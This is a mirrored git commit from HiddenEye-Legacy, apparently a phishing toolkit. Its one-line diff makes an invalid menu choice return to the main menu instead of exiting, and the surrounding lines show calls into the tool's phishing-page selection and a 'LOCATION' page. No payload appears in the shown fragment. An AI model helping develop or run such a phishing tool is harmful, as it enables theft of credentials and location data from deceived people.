mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
Fixed invalid input bug
This commit is contained in:
parent
018d3be4d4
commit
3d035ea813
@ -236,7 +236,7 @@ def start_main_menu():
|
|||||||
start_phishing_page('LOCATION', customOption)
|
start_phishing_page('LOCATION', customOption)
|
||||||
|
|
||||||
else:
|
else:
|
||||||
simple_informant.exit_message(port)
|
start_main_menu()
|
||||||
|
|
||||||
|
|
||||||
def start_phishing_page(page, custom_option): # Phishing pages selection menu
|
def start_phishing_page(page, custom_option): # Phishing pages selection menu
|
||||||
|
Loading…
x
Reference in New Issue
Block a user